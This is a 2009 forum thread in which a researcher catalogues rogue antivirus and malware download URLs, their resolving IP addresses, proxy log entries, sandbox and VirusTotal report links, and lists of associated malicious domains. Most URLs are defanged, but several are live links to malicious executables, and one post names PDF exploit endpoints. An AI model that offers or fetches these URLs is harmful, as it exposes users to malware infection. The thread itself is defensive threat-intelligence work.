soft-exe.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 02:41:58 pm
Code: [Select]
hxxp://gartnerdedault.cn/go.php?id=2002-08&key=9ba00f58f&p=1

$ dig gartnerdedault.cn +short
78.47.91.155

redirects to:

Code: [Select]
hxxp://antiviruspcscannerv7.com/download/Setup-15815_02002-8.exe

$ dig antiviruspcscannerv7.com +short
78.47.132.222
78.47.172.69

http://www.virustotal.com/analisis/88727e4a5e8d16101d286ed8e8e4f0fdf6ade9377a972ac0af8e8999e35041d8-1247236645 0/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9429660&cs=2E52D1D5E37CF0C65B98BA4928C22E4F


gartnerdedault.cn
antiviruspcscannerv7.com
satisfatcionvulture.com
thebigben.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 06:33:30 pm
Code: [Select]
hxxp://secure-safe-download.com/5/11/0/wsetup.exe

$ dig secure-safe-download.com +short
89.149.254.174

http://www.virustotal.com/analisis/40170a81178a604a528fd2215bdea9ebe1ddd40265d163ed0be68d4517f6a4f7-1247159488 11/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9409223&cs=018F2BC9E718BF761D643DF7068681A0


secure-safe-download.com
check-updates.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 10:48:39 pm
Code: [Select]
hxxp://exe-cosmos.com/onlinemovies.40016.exe

$ dig exe-cosmos.com +short
64.20.38.172

http://www.virustotal.com/analisis/a24cc53a95501ffdf70b2712abb0f8e13fea811ec2ddb641a055873c16cc4906-1247265378 9/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9434014&cs=B2C55B968A70077BCF8BED716B449CB2


exe-cosmos.com
myart-gallery.com
isyouimageshere.com
imgesinstudioonline.com
yourimagesstudio.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 02:12:10 pm
http://wepawet.iseclab.org/view.php?hash=6493b8dbd04fab6e4de6109f977ebc8e&t=1247579272&type=js


r-d-cgpay-090709.com
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on July 14, 2009, 03:03:44 pm
Interesting ... one of the IPs in the report is claiming to be a dialup line;

http://hosts-file.net/?s=217.124.41.76

PTR: 76.red-217-124-41.dialup.dynamic.ccgg.telefonica.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 05:55:50 pm
Code: [Select]
192.168.1.2 - - [14/Jul/2009:17:13:09 +0000] "GET http://picnews.bij.plhttp://picnews.bij.pl/movierol22.gif HTTP/1.0" - - "http://picnews.bij.pl/?q=?amanda+rodrigues+gatti+photo" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

http://wepawet.iseclab.org/view.php?hash=a1bd725d55c1e4637f663970f2239bff&t=1247594082&type=js

Code: [Select]
hxxp://rstdeals.com/download/6c715a5261673d3d173590f820090701/mediaplayer.exe

$ dig rstdeals.com +short
91.214.45.73

http://www.virustotal.com/analisis/cbee9bee4d83f8bc52787bfdcbf9911cf3df4471e6ea15108e657bcc87251714-1247592269 8/41

http://www.threatexpert.com/report.aspx?md5=8745485ec12fe7af7700cbc20ec75cc9



rstdeals.com
picnews.bij.pl
scanforthreats.us    <- inactive at the moment


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 06:43:42 pm
Code: [Select]
192.168.1.2 - - [14/Jul/2009:18:30:26 +0000] "GET hxxp://freeexefiles.com/onlinemovies.40070.exe HTTP/1.0" - - "hxxp://thetubesmovie.com/xplays.php?id=40070" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"


Code: [Select]
hxxp://freeexefiles.com/onlinemovies.40070.exe

$ dig freeexefiles.com +short
64.20.38.172


http://www.virustotal.com/analisis/c354e76f803d078f7ae3fd0adbe2ed5958bd9b5b5a0a486e6eb14edc0c2261ff-1247596825 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9530564&cs=74B69D8941BA70BB34F1F9640FACA542

http://www.threatexpert.com/report.aspx?md5=65ddc99913e9e4dfa11e6990b26d5425



freeexefiles.com
myart-gallery.com
isyouimageshere.com
imgesinstudioonline.com
yourimagesstudio.com
imagesrepository.com
robert-art.com
superarthome.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 15, 2009, 08:09:42 pm
Code: [Select]
hxxp://power-virus-scannerv2.com/download/Setup-e173d08_02020-1.exe

$ dig power-virus-scannerv2.com +short
83.133.126.155
78.46.251.41
69.4.230.205
94.102.48.29


http://www.virustotal.com/analisis/464febd4104dd7571bd7812a5f134157ce3316289570c1b5e7e69974e60e6f23-1247681424 4/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9552069&cs=0A2868C7866B630F3484BBD0543FAD42


power-virus-scannerv2.com
maltaintravels.com
symlabssoftwareupdate.com
maliciousbaseupdates.com
antimalwareaupdateserver.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 21, 2009, 06:25:07 pm
not unknown, just more evidence...

Code: [Select]
hxxp://youtube-adult.name/id_0084.exe

$ dig youtube-adult.name +short
210.51.181.129

http://www.virustotal.com/analisis/706741621eb3bc2caaf2e416d0f40e16385c8e0ae7eab683c46a8bcde677338a-1248200200 24/41
http://www.threatexpert.com/report.aspx?md5=f8a7d2cf3e4a052329079788f634f1b7



youtube-adult.name
porno-tube-xxx.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 21, 2009, 07:33:55 pm
Code: [Select]
hxxp://beauty-hot-pornxxx.com/nsc/TubeViewer.ver.6.48103.exe

$ dig beauty-hot-pornxxx.com +short
213.182.197.237

http://www.virustotal.com/analisis/a9b1d7ef815d810be52314a5364faf557e4e90ddd07c93ef701b524a0621c3ca-1248204907 6/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9713550&cs=D783E99FD76935850511E59E26A472BF
http://www.threatexpert.com/report.aspx?md5=a4a54368395bbed4d352fb7f73844c0d

in good company
http://www.malwaredomainlist.com/mdl.php?search=213.182.197.237&colsearch=All&quantity=50


beauty-hot-pornxxx.com
uptodatesystem.com
free-media-club.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 22, 2009, 09:05:07 pm
Code: [Select]
hxxp://bestdomus.com/Klitecodec.exe

$ dig bestdomus.com +short
216.39.57.104


http://www.virustotal.com/analisis/5fa7fd2271ba0c8b394a2089c519f95dfe896e1084f5bec949d7a6f086a5cb73-1248296258 22/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9729309&cs=9EB07AAE538861D525A48AE40AC3AEAE


bestdomus.com
safetywirelessonline.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 05:05:07 pm
Code: [Select]
hxxp://cbbugltjud.com/progs/wirfjaosw/udvvmquz.php

$ dig cbbugltjud.com +short
195.2.253.240

http://www.virustotal.com/analisis/88a16c7111f34b863e34396b4e3c422780c4ff096492cc525eb8cce97950e094-1248368774 2/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9731454&cs=E79036E68BE605ABF26D88AE362A5E62


cbbugltjud.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 06:10:30 pm
Code: [Select]
http://download-filez-now.us/s/w01386bd673n72g77v/setup.exe

$ dig download-filez-now.us +short
89.149.254.174

http://www.virustotal.com/analisis/8bbf6ebda069a5f4c4d893651ed5898b391a714bc0487d69f4956019c8de24ff-1248372725 3/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9731663&cs=50477CB05BBE69B759E0778327FE310B


download-filez-now.us
uptodatesystem.com
smart-antivirus-online.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 08:51:21 pm
Code: [Select]
http://codesdonlk.us/keygen/Keygen.BumpTop.Pro.1.05.exe

$ dig codesdonlk.us +short
221.5.74.45

http://liffils.us/download/Keygen.BumpTop.Pro.1.05.exe

$ dig liffils.us +short
221.5.74.45

http://www.virustotal.com/analisis/4cfd739786c2ca9ff79315724ab4fe6861863a6d2e9dbbc3dbc43afbb8136977-1248379966 14/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9732020&cs=F5FD4802D8021C4D7CEE7DA3AEB3AE9C


codesdonlk.us
liffils.us
loadd.in
justcounter.name
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:00:10 pm
Code: [Select]
hxxp://load-exe-world.com/streamviewer.45043.exe

$ dig load-exe-world.com +short
95.211.8.20

http://www.virustotal.com/analisis/9c85ba346f4a493c32340412885480488e7138bb0e123f66057c4e1c0ae69d23-1248383000 6/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9732021&cs=5DE963CCE05610A8427EB2B1F571DB1E


load-exe-world.com
myart-gallery.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:06:36 pm
Code: [Select]
hxxp://personalfolderscanv2.com/download/Setup-f524_02009-1480.exe

$ dig personalfolderscanv2.com +short
78.46.251.41
94.102.48.29
83.133.126.155
91.212.107.5

http://www.virustotal.com/analisis/3139d23b6f5dd10f5bc199083e301b666124b6354f3996359bcae8b24ed54805-1248379533 2/40


personalfolderscanv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:24:20 pm
Code: [Select]
hxxp://download-filez-now.us/s/w01386bd673n72g77v/setup.exe

$ dig download-filez-now.us +short
89.149.254.174

http://www.virustotal.com/analisis/baa415cd20d9e4913816145228ea101305689e6933f7384327a7e976353d97ed-1248384226 3/40
http://research.sunbelt-software.com/ViewMalware.aspx?id=9732028&cs=D1C7DC51B600C5CB8CB7E769D2B107F3


download-filez-now.us
uptodatesystem.com
smart-antivirus-online.com



Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 27, 2009, 08:35:21 pm
Code: [Select]
hxxp://securedvirusproscanner.com/download/Install-6a1e7_02022.exe

$ dig securedvirusproscanner.com +short
83.133.126.155
78.46.251.41
91.212.107.5
94.102.48.29

http://www.virustotal.com/analisis/467b01e3604eded9d203e0cb2d957ed2d15df9447e0f91ca17fc4f7b15695696-1248720946  1/40
http://research.sunbelt-software.com/ViewMalware.aspx?id=9739472&cs=11D05E946C6644353F02A3B04D8BB76D


securedvirusproscanner.com
electronicniche.com
recentsoftwareupdates.com
1worldupdatesserver.com
system-updatesv5.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 28, 2009, 10:30:52 pm
Code: [Select]
hxxp://exe-file-xxx.com/onlinemovies.1.48397.exe

$ dig exe-file-xxx.com +short
64.20.55.163

http://www.virustotal.com/analisis/97533855e26c45b0597cf97a69cab392b016a1ace49c5a17ef0df3187659075d-1248820234 4/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9741020&cs=DA9CD313E98036AB8ED57EEA8550AF76

exe-file-xxx.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 29, 2009, 12:01:27 am
Code: [Select]
hxxp://silicatinc.com/download/6a49356553413d3d3f064cd820090722/Flash.Player.HD.v10.0.exe

$ dig silicatinc.com +short
91.214.45.73

http://www.virustotal.com/analisis/696b00ae512a20b6fbd3c904bac521b4b202a41aa634f48ab4ec9be8b7100853-1248825350 14/41
http://www.threatexpert.com/report.aspx?md5=f91ed38c8e3eaa7159563a6706adcaf0


silicatinc.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 29, 2009, 10:03:48 pm
Code: [Select]
hxxp://software-updatesv6.com/Driver.exe

$ dig software-updatesv6.com +short
89.47.237.52

http://www.virustotal.com/analisis/e46ab1b5ae8d39d492cf9644eecdc706628a3ac039cadb3dc5b7fbd42d7d04d2-1248901187 7/41
http://www.threatexpert.com/report.aspx?md5=bca2e8d7c692ee851f089a192caeee3b
http://research.sunbelt-software.com/ViewMalware.aspx?id=9756186&cs=04B0552AD670D0EEC3EBE842E1EDEBF1



software-updatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 31, 2009, 02:34:49 pm
Code: [Select]
hxxp://privatevirusscannerv8.com/download/Install-683a841_02004.exe
hxxp://privatevirusscannerv8.com/download/Install-041e1_02004.exe

$ dig privatevirusscannerv8.com +short
94.102.48.29
83.133.126.155
91.212.107.5

http://www.virustotal.com/analisis/a2477036f5829a49587b9ba10edace4fe6a831e88ee11c0803255bf308abdb64-1249050966 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9789358&cs=96127053A4291A1D31EDEA24FC73825E
http://www.threatexpert.com/report.aspx?md5=97c28477dea3b3265e382c95346b5bc7


privatevirusscannerv8.com
goldmine-sachs.com
defenderbaseupdatesv2.com
thebigben.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 31, 2009, 03:55:54 pm
Code: [Select]
hxxp://filesexe.com/onlinemovies.1.48397.exe

$ dig filesexe.com +short
95.211.8.20

http://www.virustotal.com/analisis/7453a4c4a552e27ce6e92c02789c113f756b61c8a33404c13620296c553cde26-1249055795 10/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9790105&cs=E4A8A8089077AD2EBC7DFD6A54F30C93
http://anubis.iseclab.org/?action=result&task_id=1059254c7e1282b444dae6331fd25651a&format=html
http://www.threatexpert.com/report.aspx?md5=4e91cc044591a0b9f62cba048dd1f017


filesexe.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 02, 2009, 07:53:07 pm
Code: [Select]
hxxp://online-pro-scan.com/download/Install-27ab1_2001-30.exe

$ dig online-pro-scan.com +short
78.47.172.66
209.44.126.52
88.198.41.170

http://www.virustotal.com/analisis/76e5ed76b5a573cc8fb8f18d8c3b2717916f0d7133cf09154d6299e2da8e0d4b-1249173034 2/41
http://anubis.iseclab.org/?action=result&task_id=1e0beaf59d1b4ba243de3752a514e7168
http://research.sunbelt-software.com/ViewMalware.aspx?id=9821621&cs=4B4540B9C4A6BEC5B4C92BBF50DE63A7

online-pro-scan.com
challenges-cup.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 03, 2009, 12:31:12 am
Code: [Select]
hxxp://212.117.174.14/racing.exe

http://www.virustotal.com/analisis/415c1520662f4bc3291816d6af4469f89df6f0966ac9bdb6f8a1999b27db9953-1249259122 14/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9825512&cs=C597128F2D8896770F01E456644D74E6
http://anubis.iseclab.org/?action=result&task_id=1b38d6578a8c104a4752500ec64c31d2a


Code: [Select]
hxxp://core2623.racingmoney-0110.com/d_program_all.cgi?host=host&id=0

$ dig core2623.racingmoney-0110.com +short
95.169.190.147

http://www.virustotal.com/analisis/828835fb4b8ecc5064a0f6496ba160d37a32022dee7f82a0c8b275d312620b15-1249258832 11/40
http://anubis.iseclab.org/?action=result&task_id=122149ecee9f30814cda563c8e90a21ec
http://research.sunbelt-software.com/ViewMalware.aspx?id=9825487&cs=4F7A583CE43B3220C9E7C292612F9A0B



racingmoney-0110.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 04, 2009, 01:51:21 pm
Code: [Select]
192.168.1.10 - - [ 4/Aug/2009:13:29:39 +0000] "GET http://synthetic-electric.cn/go.php?id=2003-03&key=e20dfa513&p=1 HTTP/1.1" - - "http://whitepg-images.adbureau.net/whitepg/2009-07%20hotel_728x90.swf?clickTag=http://atl.whitepages.com/accipiter/adclick/CID=0000533400000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
192.168.1.10 - - [ 4/Aug/2009:13:29:39 +0000] "GET http://onlinesecurityscanv11.com/1/?sess==W219jDwOS0zJmlwPTY1LjEyMy4xOS42MiZ0aW1lPTEyNDMzMkIMNQkO HTTP/1.1" - - "http://whitepg-images.adbureau.net/whitepg/2009-07%20hotel_728x90.swf?clickTag=http://atl.whitepages.com/accipiter/adclick/CID=0000533400000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
192.168.1.10 - - [ 4/Aug/2009:13:29:40 +0000] "GET http://onlinesecurityscanv11.com/1/img/jquery.js HTTP/1.1" - - "http://onlinesecurityscanv11.com/1/?sess==W219jDwOS0zJmlwPTY1LjEyMy4xOS42MiZ0aW1lPTEyNDMzMkIMNQkO" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"


Code: [Select]
hxxp://onlinesecurityscanv11.com/download/Install-0c6_2003-3.exe

$ dig onlinesecurityscanv11.com +short
88.198.41.170
209.44.126.52
78.47.172.66

http://www.virustotal.com/analisis/bd424b5f474ae9ef45daae7cb9064403497c187fc5b168b2fe859b27ac979379-1249393866 7/41

http://research.sunbelt-software.com/ViewMalware.aspx?id=9872536&cs=57BD3287F84998C9C7604E984A6956BF

http://anubis.iseclab.org/?action=result&task_id=11526942bdf3251a4597dd8e67e0cebd9


onlinesecurityscanv11.com
challenges-cup.com
systemupdatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 05, 2009, 07:33:00 pm
Code: [Select]
hxxp://nucleargaming.net/errorlogs/aleluia.gif

$ file aleluia.gif
aleluia.gif: MS-DOS executable, MZ for MS-DOS

$ dig nucleargaming.net +short
209.25.133.225

http://www.virustotal.com/analisis/7fdadabb4922f008671d7a156acb8f8812814f156b7bffb22a82ef4c7a766ef3-1249424356 16/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9916879&cs=30A50ABCF454C2FE158BBE92ABE6350E


nucleargaming.net
ekeye.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 03:07:40 pm
Code: [Select]
hxxp://exeeasy.com/flash-plugin.45054.exe

$ dig exeeasy.com +short
95.211.8.20

http://www.virustotal.com/analisis/56c77236208755639cff2d30e2923cace9b578dcb55a9281b2365c79696a5e1e-1249571269 3/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9938576&cs=AC880A64B083A963D87B0F3A8F56DF8B
http://anubis.iseclab.org/?action=result&task_id=1cd8e3c8dc84f3b449912c607698e7cf4


exeeasy.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 05:24:52 pm
Code: [Select]
hxxp://gofastscanner.com/download/Install-420d_2003-3.exe

$ dig gofastscanner.com +short
88.198.41.170
209.44.126.52
78.47.172.66

http://www.virustotal.com/analisis/27517370ea2e189c619bea5bd11afdacef7f4781b3a00989e598e5e3de39c113-1249577337 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9941812&cs=CA6C79071187BA84AB4E181F5E372678


bitmap files?   
Code: [Select]
hxxp://baseprogrammupdatesv5.com/logo.bmp

$ file logo.bmp
logo.bmp: data

Code: [Select]
hxxp://windefenderbaseupdate.com/template.bmp

$ file template.bmp
template.bmp: data



gofastscanner.com
keyboard-mouse-fun.com
baseprogrammupdatesv5.com
windefenderbaseupdate.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 06:00:25 pm
Code: [Select]
hxxp://govirusscanner.com/download/Install-1408e_2031.exe

$ dig govirusscanner.com +short
91.212.107.5
94.102.48.29
188.40.61.236
83.133.126.155
94.102.51.26

http://www.virustotal.com/analisis/8cdb3d69147640c82c8b1657ba90c5da3ecb1ee0eec5d6fc6ec23c07953f6f6c-1249581622 0/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9942677&cs=7DCBC5364B93941949240365756C7FFB


govirusscanner.com
june-crossover.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 07, 2009, 02:31:59 pm
I can be just as relentless

Code: [Select]
hxxp://gomalwarescanner.com/download/Install-fa6bb14_2003-3.exe

$ dig gomalwarescanner.com +short
88.198.41.170
78.47.172.66
209.44.126.52

http://www.virustotal.com/analisis/c007ad216705e73b58c260ab049ba00a91745f0b092b1b29db1c8b360874df31-1249652331 2/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9987227&cs=B9EBAC0B6ECE5BFB9A45F608B027555B


gomalwarescanner.com
keyboard-mouse-fun.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 02:16:48 pm
Code: [Select]
hxxp://top1959.cn/PC_protect.exe

$ dig top1959.cn +short
211.95.78.98

http://www.virustotal.com/analisis/f9c3f064210f83bc8d240208e12b87ce624d40bc29f7d1e6b9d1de3392c40322-1249994080 27/41
http://www.threatexpert.com/report.aspx?md5=4cabecc7fc8b024b4be8239721a4baec
http://anubis.iseclab.org/?action=result&task_id=1e49cbc6207b52b64859636457ce0f47b&format=html


top1959.cn
rubimbablo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 02:52:54 pm
Code: [Select]
hxxp://wfoto.front.ru/fotos.com

$ dig wfoto.front.ru +short
ftp.front.ru.
82.204.219.224

http://www.virustotal.com/analisis/2044851a8ec36f76359fc31233071be8f9d348d91a73a47fddde6a575c4f7246-1250001993 18/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081211&cs=384D6631678577C784F7B7ABCD8BF452
http://anubis.iseclab.org/?action=result&task_id=154ac9b98fc08fa54bddb70df6868e0d8&format=html

Code: [Select]
hxxp://kede.hpg.ig.com.br/ree1.html

$ file ree1.html
ree1.html: data

hxxp://kede.hpg.ig.com.br/ree2.html

$ file ree2.html
ree2.html: data

hxxp://kedex02.hpg.ig.com.br/nl2.html

$ file nl2.html
nl2.html: data

hxxp://kedex02.hpg.ig.com.br/nl3.html

$ file nl3.html
nl3.html: data

hxxp://kedex02.hpg.ig.com.br/nl5.html

$ file nl5.html
nl5.html: data

hxxp://kedex02.hpg.ig.com.br/nl6.html

$ file nl6.html
nl6.html: data



front.ru
kedex02.hpg.ig.com.br
kede.hpg.ig.com.br


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 03:33:15 pm
Code: [Select]
hxxp://antispywarelivescanv5.com/download/Install-b85ed90_2015.exe

$ dig antispywarelivescanv5.com +short
83.133.123.174
188.40.61.236
91.212.107.5
94.102.51.26
94.102.48.29
83.133.126.155

http://www.virustotal.com/analisis/75774261b858b5963c8896b7613334ac98a6b2539c72de5babb8be969f7598da-1249982407 7/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081212&cs=7C257D272767FA948E0A9186A93BE6EA

Code: [Select]
hxxp://recentbaseupdatesv6.com/logo.bmp

$ file logo.bmp
logo.bmp: data

$ dig recentbaseupdatesv6.com +short
84.16.255.108


antispywarelivescanv5.com
recentbaseupdatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 05:08:38 pm
Code: [Select]
hxxp://softwareaddonsuploadv3.com/Driver.exe

$ dig softwareaddonsuploadv3.com +short
89.47.237.52

http://www.virustotal.com/analisis/be484ee278ba86af840bbefb4d7d3c76a0091ab06d0f350153c7861732352535-1249979821 4/41
http://anubis.iseclab.org/?action=result&task_id=1f0223f3cacc009d469ff33e4924cea58&format=html



softwareaddonsuploadv3.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 06:36:04 pm
Code: [Select]
hxxp://antimalwaresecurescanv2.com/download/Install-4a8_2006-39.exe

$ dig antimalwaresecurescanv2.com +short
91.212.107.5
83.133.126.155
83.133.123.174
94.102.48.29
188.40.61.236
94.102.51.26

http://www.virustotal.com/analisis/681a877090b8e2275d781fadd7b9e1fb7700446365cc528db224d67b94cd548a-1250011543 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081224&cs=6545E33A0C238A3850068D1E8B8B5A44


consensualart.cn                                <- originating domain
antimalwaresecurescanv2.com
june-crossover.com
recentbaseupdatesv6.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 12, 2009, 09:39:01 pm
Code: [Select]
http://spywarescannerv4.com/download/Antivirus-b4ba_2015.exe

$ dig spywarescannerv4.com +short
83.133.123.174
94.102.51.26
94.102.48.29
188.40.61.236
91.212.107.5

http://www.virustotal.com/analisis/2b79674aab8e8faae071e057b9f65f3faac1c75a6453bf9db872d6802ea09f1b-1250110200 0/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10084941&cs=0604BAB0703FA5D36C0943BD14FA3471


spywarescannerv4.com


Title: Re: Mr Clean's dirt
Post by: MysteryFCM on August 13, 2009, 12:33:34 pm
Just out of interest, have you been continuously monitoring these to see how quickly they're going down again? (last checks I did showed they only stayed online for 12-24 hours)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 13, 2009, 12:47:18 pm
Code: [Select]
hxxp://silver-metscorp.com/1/pdf.php?spl=pdf_ie2    <- malicious pdf download
hxxp://silver-metscorp.com/1/getexe.php?spl=pdf     <- results in executable download

$ dig silver-metscorp.com +short
211.95.79.114

http://www.virustotal.com/analisis/2cfacea8ae6e16b8baa609d3b47c13af5514e84e4f071dd2884fb207161c3a1f-1248538894 36/41



silver-metscorp.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 14, 2009, 02:27:35 pm
Code: [Select]
hxxp://www.7y3x.cn/svchost.exe

$ dig www.7y3x.cn +short
65.60.6.178

http://www.virustotal.com/analisis/8ecad389c0cdcd1d09514f0ea95e3027518a125755be1cb3e8ea2bcae41ee9d1-1250192251 11/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10098336&cs=C760F317403DD8AF6D5E8F43FE3895F9


7y3x.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 14, 2009, 08:39:04 pm
Code: [Select]
hxxp://exesoftsite.com/flash-plugin.40052.exe

$ dig exesoftsite.com +short
95.211.8.20

http://www.virustotal.com/analisis/1cfbd67d80b37315528494aac9ef76d8222fb67eda4761fa73ab19094ea12a57-1250282281 4/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10111865&cs=BDD24D14FCC5F49C6230DD66B8170B52


exesoftsite.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 15, 2009, 01:34:57 pm
Code: [Select]
hxxp://snowboard2009.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig snowboard2009.cn +short
78.46.201.89

hxxp://online-antivir-scanv2.com/download/Antivirus-b90b456_2006-71.exe

$ dig online-antivir-scanv2.com +short
83.133.126.155
91.212.107.5
188.40.61.236
88.198.120.177
88.198.107.25

http://wepawet.iseclab.org/view.php?hash=6a55d36af380d8ac0b4156ac43e28d0e&t=1250343723&type=js
http://www.virustotal.com/analisis/40048afee16ae74db740c8fdbe46d6d5bbb652b5a40fedfcc40c2b87c281dd72-1250322629 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10118210&cs=B7CD4C09C8166562B8085AC246B60898
http://anubis.iseclab.org/?action=result&task_id=1105b02ae9347dc3481ec1f33fe2f376a&format=html
http://www.threatexpert.com/report.aspx?md5=e7f9186573418baff7f2206ee54d8f5a


snowboard2009.cn
online-antivir-scanv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 17, 2009, 02:43:35 pm
Code: [Select]
hxxp://yourholidaytoday.cn/go.php?id=2006-39&key=0522c7066&p=1

$ dig yourholidaytoday.cn +short
78.46.201.89


Code: [Select]
hxxp://premium-antivirus-scanv6.com/download/Antivirus-e728d9_2006-39.exe

$ dig premium-antivirus-scanv6.com +short
188.40.61.236
83.133.126.155
94.102.51.26
91.212.107.5
88.198.120.177
88.198.107.25

http://www.virustotal.com/analisis/058a3a3c9cd3be6cbbcfba65f57a81a5310736f8c2e1d7decc4bdb89a4d78df2-1250519541 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10142158&cs=835C757633B8C0CB2488D131AAB53B22


yourholidaytoday.cn
premium-antivirus-scanv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 17, 2009, 05:15:02 pm
Code: [Select]
hxxp://premium-antispy-scanv3.com/download/Antivirus-1408e3_2024-3.exe

$ dig premium-antispy-scanv3.com +short
91.212.107.5
83.133.126.155
94.102.51.26
188.40.61.236
88.198.120.177
88.198.107.25

http://www.virustotal.com/analisis/058a3a3c9cd3be6cbbcfba65f57a81a5310736f8c2e1d7decc4bdb89a4d78df2-1250525395 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10142158&cs=835C757633B8C0CB2488D131AAB53B22


premium-antispy-scanv3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 18, 2009, 12:00:03 pm
Code: [Select]
hxxp://www.bulletproofsoft.com/download/bpssrsk.exe

$ dig www.bulletproofsoft.com +short
75.125.246.34

http://www.virustotal.com/analisis/fba381200451586c98dfebead14349827ff78ff8dbe3eadb75741c4f3e99ce9b-1250597035 13/38
http://anubis.iseclab.org/?action=result&task_id=14e49b7cb0f108c4449aebe53c69b9621&format=html

http://www.malwaredomainlist.com/mdl.php?search=75.125.246&colsearch=All&quantity=50


bulletproofsoft.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 18, 2009, 06:45:24 pm
Code: [Select]
hxxp://antivirusplus2010.com/install/avplus.exe

$ dig antivirusplus2010.com +short
195.95.151.176

http://www.virustotal.com/analisis/2241106c125ee4751fdafac89a73cc76d655be9decad021797c419873e70efe7-1250621461 7/41
http://anubis.iseclab.org/?action=result&task_id=1b2ce15ca9edeec9441891a3b418372ee
http://research.sunbelt-software.com/ViewMalware.aspx?id=10155914&cs=E8326541FCDF6A7F6D0626CFAA475224

http://www.malwaredomainlist.com/mdl.php?search=195.95.151&colsearch=All&quantity=50


antivirusplus2010.com
antivirplus2009.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 20, 2009, 03:34:37 pm
Code: [Select]
hxxp://nothing-to-wear.cn/go.php?id=2015&key=ace6725ec&p=1

$ dig nothing-to-wear.cn +short
78.46.201.89

